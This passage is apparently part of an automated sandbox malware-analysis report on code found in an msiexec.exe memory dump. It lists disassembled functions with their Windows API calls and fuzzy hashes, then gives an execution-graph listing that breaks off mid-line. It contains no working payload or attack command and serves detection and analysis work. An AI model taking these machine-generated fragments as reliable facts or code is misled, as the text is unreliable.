                                                                                        • Instruction Fuzzy Hash: 0C017572602B257B63120AB64C4CDBB6A6DEFC2A64311476EFD04C7208DA649C0381B1
                                                                                        Function 22325B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,2232636D,22325713,00000000,?,22322249,?,?,22321D66,00000000,?,?,00000000), ref: 22325B7F
                                                                                        • _free.LIBCMT ref: 22325BB4
                                                                                        • _free.LIBCMT ref: 22325BDB
                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22325BE8
                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 22325BF1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free
                                                                                        • String ID:
                                                                                        • API String ID: 3170660625-0
                                                                                        • Opcode ID: 75cbbd9e6a760d7ca035fd34c875dfb1fd051963c891a2d85605d8f0e28f086e
                                                                                        • Instruction ID: cea23ecb7b793d03b27a3dbbea842f796095f277086980034590328318f5bb00
                                                                                        • Opcode Fuzzy Hash: 75cbbd9e6a760d7ca035fd34c875dfb1fd051963c891a2d85605d8f0e28f086e
                                                                                        • Instruction Fuzzy Hash: 2701F4F3184F01ABE31B16741DA4E5B3A6D9BD1A707114329FD16E6152EE78CF0285A4
                                                                                        Function 22321E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,?,?,223210DF,?,?,?,00000000), ref: 22321E9A
                                                                                        • lstrcatW.KERNEL32(?,?,?,223210DF,?,?,?,00000000), ref: 22321EAC
                                                                                        • lstrlenW.KERNEL32(?,?,223210DF,?,?,?,00000000), ref: 22321EB3
                                                                                        • lstrlenW.KERNEL32(?,?,223210DF,?,?,?,00000000), ref: 22321EC8
                                                                                        • lstrcatW.KERNEL32(?,223210DF,?,223210DF,?,?,?,00000000), ref: 22321ED3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$lstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 493641738-0
                                                                                        • Opcode ID: a157509dc1df481e0ddeffad93faa80b5b80defcb6491b2ca17c479a6bf2c07b
                                                                                        • Instruction ID: a557914debcf86f16ccbb1843ecc02d6cca29d8b709e2aa6ab0b533f7ace008c
                                                                                        • Opcode Fuzzy Hash: a157509dc1df481e0ddeffad93faa80b5b80defcb6491b2ca17c479a6bf2c07b
                                                                                        • Instruction Fuzzy Hash: 38F0E2261402147AD322276AAC85EBF7B7CEFCAB21B10411EFA08831A09B985C4282B5
                                                                                        Function 223291B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 223291D0
                                                                                          • Part of subcall function 2232571E: HeapFree.KERNEL32(00000000,00000000,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?), ref: 22325734
                                                                                          • Part of subcall function 2232571E: GetLastError.KERNEL32(?,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?,?), ref: 22325746
                                                                                        • _free.LIBCMT ref: 223291E2
                                                                                        • _free.LIBCMT ref: 223291F4
                                                                                        • _free.LIBCMT ref: 22329206
                                                                                        • _free.LIBCMT ref: 22329218
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 30a542a54925d5bb34a6e319d99d44c7380d4a16385c017b451747eb9bda0599
                                                                                        • Instruction ID: 31fbed3a1536b3295fc403480eda12c7eedc8febc456ad1c17b1a223d28cba9e
                                                                                        • Opcode Fuzzy Hash: 30a542a54925d5bb34a6e319d99d44c7380d4a16385c017b451747eb9bda0599
                                                                                        • Instruction Fuzzy Hash: C9F0C2B2594B449BC734CB59D6C4C067BDDEB60B24B208D05F908CB400CB78FD808AE0
                                                                                        Function 22325351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 2232536F
                                                                                          • Part of subcall function 2232571E: HeapFree.KERNEL32(00000000,00000000,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?), ref: 22325734
                                                                                          • Part of subcall function 2232571E: GetLastError.KERNEL32(?,?,2232924F,?,00000000,?,00000000,?,22329276,?,00000007,?,?,22327E5A,?,?), ref: 22325746
                                                                                        • _free.LIBCMT ref: 22325381
                                                                                        • _free.LIBCMT ref: 22325394
                                                                                        • _free.LIBCMT ref: 223253A5
                                                                                        • _free.LIBCMT ref: 223253B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: d411168cddccecfdf717639c55257c47bd028d97d1831bf0782f0242b7b16f01
                                                                                        • Instruction ID: 93514e717067a69f1ef44bad538a94c22484f7ab432ed097f349c604d2d5d94c
                                                                                        • Opcode Fuzzy Hash: d411168cddccecfdf717639c55257c47bd028d97d1831bf0782f0242b7b16f01
                                                                                        • Instruction Fuzzy Hash: CFF01DF2C95B10DBC62B5B2895904483BA9A764B60B418A06FD109B258D7BD8B129BC0
                                                                                        Function 22324BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 22324C1D
                                                                                        • _free.LIBCMT ref: 22324CE8
                                                                                        • _free.LIBCMT ref: 22324CF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$FileModuleName
                                                                                        • String ID: C:\Windows\System32\msiexec.exe
                                                                                        • API String ID: 2506810119-1382325751
                                                                                        • Opcode ID: e68d946f17d01ce79b721578f4db952487c71377492e08cfeffecafc13eb0102
                                                                                        • Instruction ID: 7b44650b0610800cc63742be8c208fbce9af1fb066ab833f4929b6ecd974cd56
                                                                                        • Opcode Fuzzy Hash: e68d946f17d01ce79b721578f4db952487c71377492e08cfeffecafc13eb0102
                                                                                        • Instruction Fuzzy Hash: 673177B1A40B18FFD722CF99C980D9EBBFCEF95724F109256EA0497211D6748E41CBA0
                                                                                        Function 223286E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,22326FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 22328731
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 223287BA
                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 223287CC
                                                                                        • __freea.LIBCMT ref: 223287D5
                                                                                          • Part of subcall function 223256D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 22325702
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                        • String ID:
                                                                                        • API String ID: 2652629310-0
                                                                                        • Opcode ID: 754b452b298ffccafe0f58437a8d867e486590ce3e0a1405e14e58c533a91139
                                                                                        • Instruction ID: 7586a3f0b6834078c9f444e478fb12f5dd5e1785963ec734d69e312dcbbbe5b9
                                                                                        • Opcode Fuzzy Hash: 754b452b298ffccafe0f58437a8d867e486590ce3e0a1405e14e58c533a91139
                                                                                        • Instruction Fuzzy Hash: 7B31BE72A0071AABDF298F68CC80EAF7BA9EB44314F414268FD04DB150E735DD51CBA0
                                                                                        Function 2232C7E6 Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(2232C7DD), ref: 2232C7E6
                                                                                        • GetModuleHandleA.KERNEL32(?,2232C7DD), ref: 2232C838
                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 2232C860
                                                                                          • Part of subcall function 2232C803: GetProcAddress.KERNEL32(00000000,2232C7F4), ref: 2232C804
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID:
                                                                                        • API String ID: 1646373207-0
                                                                                        • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                        • Instruction ID: 5ad819b690b694b014f47bb269516ac808a64dc750aaef9287fe2a5bb336e23b
                                                                                        • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                        • Instruction Fuzzy Hash: 0A01F100945F9138EB2156744D01EBAAFDC9B277A4B23DF96E240C7293D9B18E06C3F6
                                                                                        Function 22325CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,22321D66,00000000,00000000,?,22325C88,22321D66,00000000,00000000,00000000,?,22325E85,00000006,FlsSetValue), ref: 22325D13
                                                                                        • GetLastError.KERNEL32(?,22325C88,22321D66,00000000,00000000,00000000,?,22325E85,00000006,FlsSetValue,2232E190,FlsSetValue,00000000,00000364,?,22325BC8), ref: 22325D1F
                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,22325C88,22321D66,00000000,00000000,00000000,?,22325E85,00000006,FlsSetValue,2232E190,FlsSetValue,00000000), ref: 22325D2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 3177248105-0
                                                                                        • Opcode ID: e16e34847ec3921fbc00445e2e2e3440568a3faead74d5902c76135ec446388f
                                                                                        • Instruction ID: 6b4290f002c465085903029b8a951db0fe30e4bd0658fffd4d2102b2d8d20d98
                                                                                        • Opcode Fuzzy Hash: e16e34847ec3921fbc00445e2e2e3440568a3faead74d5902c76135ec446388f
                                                                                        • Instruction Fuzzy Hash: 47012477241B26ABC3164EA88C58F46779CEF05AA1B110B26FE0AD7145C724CE01CAE0
                                                                                        Function 223263F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 2232655C
                                                                                          • Part of subcall function 223262BC: IsProcessorFeaturePresent.KERNEL32(00000017,223262AB,00000000,?,?,?,?,00000016,?,?,223262B8,00000000,00000000,00000000,00000000,00000000), ref: 223262BE
                                                                                          • Part of subcall function 223262BC: GetCurrentProcess.KERNEL32(C0000417), ref: 223262E0
                                                                                          • Part of subcall function 223262BC: TerminateProcess.KERNEL32(00000000), ref: 223262E7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                        • String ID: *?$.
                                                                                        • API String ID: 2667617558-3972193922
                                                                                        • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                        • Instruction ID: 4423722bad7d7b7e2229d88f6b3137aa34d1693fc524a206293524b82c051b1b
                                                                                        • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                        • Instruction Fuzzy Hash: 54519E75E0070AEFDB14CFA8C980AADBBB9EF58314F24826AD954E7345E6359E018F50
                                                                                        Function 223216AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strlen
                                                                                        • String ID: : $Se.
                                                                                        • API String ID: 4218353326-4089948878
                                                                                        • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                        • Instruction ID: f086ca4b9972b899eb20bb3a1cc88c6a13144c648d3b5948b94a944d18d24df9
                                                                                        • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                        • Instruction Fuzzy Hash: 4711C4B1900748AECB10CFAC9840BDEFBFCAF59314F104056E645E7212E6705A028B65
                                                                                        Function 22321EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 22322903
                                                                                          • Part of subcall function 223235D2: RaiseException.KERNEL32(?,?,?,22322925,00000000,00000000,00000000,?,?,?,?,?,22322925,?,223321B8), ref: 22323632
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 22322920
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw$ExceptionRaise
                                                                                        • String ID: Unknown exception
                                                                                        • API String ID: 3476068407-410509341
                                                                                        • Opcode ID: 6a3d8d590277d4ef02837f603b7432560a6f01f6ddc36e3aab0c0b270608c5c8
                                                                                        • Instruction ID: 35b26efea39d375e38fd351b6a6fcd9d78c02f96d266ef63ab889bd50a16bd98
                                                                                        • Opcode Fuzzy Hash: 6a3d8d590277d4ef02837f603b7432560a6f01f6ddc36e3aab0c0b270608c5c8
                                                                                        • Instruction Fuzzy Hash: A8F0A434A00B0C778B14A6A4ED44DA9777C7B10750B504361EA25A6491EBF1EE26C5C0
                                                                                        Function 223269F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetOEMCP.KERNEL32(00000000,?,?,22326C7C,?), ref: 22326A1E
                                                                                        • GetACP.KERNEL32(00000000,?,?,22326C7C,?), ref: 22326A35
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.3472674744.0000000022321000.00000040.00001000.00020000.00000000.sdmp, Offset: 22320000, based on PE: true
                                                                                        • Associated: 00000007.00000002.3472619197.0000000022320000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.3472674744.0000000022336000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_22320000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: |l2"
                                                                                        • API String ID: 0-2037442537
                                                                                        • Opcode ID: 0e0d73e4fe81f290368bc8d82f08681a6afd827fad9fc6b578baaa5609e79a5b
                                                                                        • Instruction ID: f0da75427e15c2937259bbbef846082acfea24cb60149fd52114ca2bd43e88fc
                                                                                        • Opcode Fuzzy Hash: 0e0d73e4fe81f290368bc8d82f08681a6afd827fad9fc6b578baaa5609e79a5b
                                                                                        • Instruction Fuzzy Hash: 8EF04FB08407098BD711DBA8C598B6C7778FF40335F548749F8398A1DADB799E85CB81

                                                                                        Execution Graph

                                                                                        Execution Coverage:5.6%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:1.3%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:76
                                                                                        execution_graph 40277 441819 40280 430737 40277->40280 40279 441825 40281 430756 40280->40281 40282 43076d 40280->40282 40283 430774 40281->40283 40284 43075f 40281->40284 40282->40279 40295 43034a memcpy 40283->40295 40294 4169a7 11 API calls 40284->40294 40287 4307ce 40288 430819 memset 40287->40288 40296 415b2c 11 API calls 40287->40296 40288->40282 40289 43077e 40289->40282 40289->40287 40292 4307fa 40289->40292 40291 4307e9 40291->40282 40291->40288 40297 4169a7 11 API calls 40292->40297 40294->40282 40295->40289 40296->40291 40297->40282 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37966 40dd07 memset 37891->37966 37892 412827 37971 40db69 memset 37892->37971 37896 412822 37993 4125b6 ??3@YAXPAX DeleteObject 37896->37993 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37976 41268e 37898->37976 37900 412966 37994 40b1ab free free 37900->37994 37992 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37992 37905 41296f 37995 40b633 37905->37995 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37999 40a804 memset 37930->37999 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38021 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38021 38010 444722 37941->38010 37946 41259b wcscpy 37946->37886 38026 40b1ab free free 37947->38026 37949 40ad76 38027 40aa04 37949->38027 37952 40a9ce malloc memcpy free free 37954 40ac5c 37952->37954 37953 40ad4b 37953->37949 38032 40a9ce 37953->38032 37954->37949 37954->37952 37954->37953 37956 40acf0 37954->37956 37957 40ace7 free 37954->37957 38030 40a8d0 7 API calls 37954->38030 37956->37954 38031 4099f4 malloc memcpy free 37956->38031 37957->37954 37962 40ada2 37963 40adc9 37962->37963 37965 40adaa 37962->37965 37963->37891 37963->37892 37964 40adb3 _wcsicmp 37964->37963 37964->37965 37965->37963 37965->37964 38040 40dce0 37966->38040 37968 40dd3a GetModuleHandleW 38045 40dba7 37968->38045 37972 40dce0 3 API calls 37971->37972 37973 40db99 37972->37973 38117 40dae1 37973->38117 38131 402f3a 37976->38131 37978 412766 37978->37896 37978->37901 37979 4126d3 _wcsicmp 37980 4126a8 37979->37980 37980->37978 37980->37979 37982 41270a 37980->37982 38165 4125f8 7 API calls 37980->38165 37982->37978 38134 411ac5 37982->38134 37992->37907 37993->37900 37994->37905 37996 40b640 37995->37996 37997 40b639 free 37995->37997 37998 40b1ab free free 37996->37998 37997->37996 37998->37913 38000 40a83b GetSystemDirectoryW 37999->38000 38001 40a84c wcscpy 37999->38001 38000->38001 38006 409719 wcslen 38001->38006 38004 40a881 LoadLibraryW 38005 40a886 38004->38005 38005->37931 38005->37934 38007 409724 38006->38007 38008 409739 wcscat LoadLibraryW 38006->38008 38007->38008 38009 40972c wcscat 38007->38009 38008->38004 38008->38005 38009->38008 38011 444732 38010->38011 38012 444728 DeleteObject 38010->38012 38022 409cc3 38011->38022 38012->38011 38014 412551 38015 4010f9 38014->38015 38016 401130 38015->38016 38017 401134 GetModuleHandleW LoadIconW 38016->38017 38018 401107 wcsncat 38016->38018 38019 40a7be 38017->38019 38018->38016 38020 40a7d2 38019->38020 38020->37946 38020->38020 38021->37941 38025 409bfd memset wcscpy 38022->38025 38024 409cdb CreateFontIndirectW 38024->38014 38025->38024 38026->37954 38028 40aa14 38027->38028 38029 40aa0a free 38027->38029 38028->37962 38029->38028 38030->37954 38031->37956 38033 40a9e7 38032->38033 38034 40a9dc free 38032->38034 38039 4099f4 malloc memcpy free 38033->38039 38035 40a9f3 38034->38035 38038 40a8d0 7 API calls 38035->38038 38037 40a9f2 38037->38035 38038->37949 38039->38037 38064 409bca GetModuleFileNameW 38040->38064 38042 40dce6 wcsrchr 38043 40dcf5 38042->38043 38044 40dcf9 wcscat 38042->38044 38043->38044 38044->37968 38065 44db70 38045->38065 38049 40dbfd 38068 4447d9 38049->38068 38052 40dc34 wcscpy wcscpy 38094 40d6f5 38052->38094 38053 40dc1f wcscpy 38053->38052 38056 40d6f5 3 API calls 38057 40dc73 38056->38057 38058 40d6f5 3 API calls 38057->38058 38059 40dc89 38058->38059 38060 40d6f5 3 API calls 38059->38060 38061 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38060->38061 38100 40da80 38061->38100 38064->38042 38066 40dbb4 memset memset 38065->38066 38067 409bca GetModuleFileNameW 38066->38067 38067->38049 38070 4447f4 38068->38070 38069 40dc1b 38069->38052 38069->38053 38070->38069 38071 444807 ??2@YAPAXI 38070->38071 38072 44481f 38071->38072 38073 444873 _snwprintf 38072->38073 38074 4448ab wcscpy 38072->38074 38107 44474a 8 API calls 38073->38107 38076 4448bb 38074->38076 38108 44474a 8 API calls 38076->38108 38077 4448a7 38077->38074 38077->38076 38079 4448cd 38109 44474a 8 API calls 38079->38109 38081 4448e2 38110 44474a 8 API calls 38081->38110 38083 4448f7 38111 44474a 8 API calls 38083->38111 38085 44490c 38112 44474a 8 API calls 38085->38112 38087 444921 38113 44474a 8 API calls 38087->38113 38089 444936 38114 44474a 8 API calls 38089->38114 38091 44494b 38115 44474a 8 API calls 38091->38115 38093 444960 ??3@YAXPAX 38093->38069 38095 44db70 38094->38095 38096 40d702 memset GetPrivateProfileStringW 38095->38096 38097 40d752 38096->38097 38098 40d75c WritePrivateProfileStringW 38096->38098 38097->38098 38099 40d758 38097->38099 38098->38099 38099->38056 38101 44db70 38100->38101 38102 40da8d memset 38101->38102 38103 40daac LoadStringW 38102->38103 38104 40dac6 38103->38104 38104->38103 38106 40dade 38104->38106 38116 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38104->38116 38106->37896 38107->38077 38108->38079 38109->38081 38110->38083 38111->38085 38112->38087 38113->38089 38114->38091 38115->38093 38116->38104 38127 409b98 GetFileAttributesW 38117->38127 38119 40daea 38120 40db63 38119->38120 38121 40daef wcscpy wcscpy GetPrivateProfileIntW 38119->38121 38120->37897 38128 40d65d GetPrivateProfileStringW 38121->38128 38123 40db3e 38129 40d65d GetPrivateProfileStringW 38123->38129 38125 40db4f 38130 40d65d GetPrivateProfileStringW 38125->38130 38127->38119 38128->38123 38129->38125 38130->38120 38166 40eaff 38131->38166 38135 411ae2 memset 38134->38135 38136 411b8f 38134->38136 38207 409bca GetModuleFileNameW 38135->38207 38148 411a8b 38136->38148 38138 411b0a wcsrchr 38139 411b22 wcscat 38138->38139 38140 411b1f 38138->38140 38208 414770 wcscpy wcscpy wcscpy CloseHandle 38139->38208 38140->38139 38142 411b67 38209 402afb 38142->38209 38146 411b7f 38265 40ea13 SendMessageW memset SendMessageW 38146->38265 38149 402afb 27 API calls 38148->38149 38150 411ac0 38149->38150 38151 4110dc 38150->38151 38152 41113e 38151->38152 38157 4110f0 38151->38157 38290 40969c LoadCursorW SetCursor 38152->38290 38154 411143 38291 444a54 38154->38291 38294 4032b4 38154->38294 38155 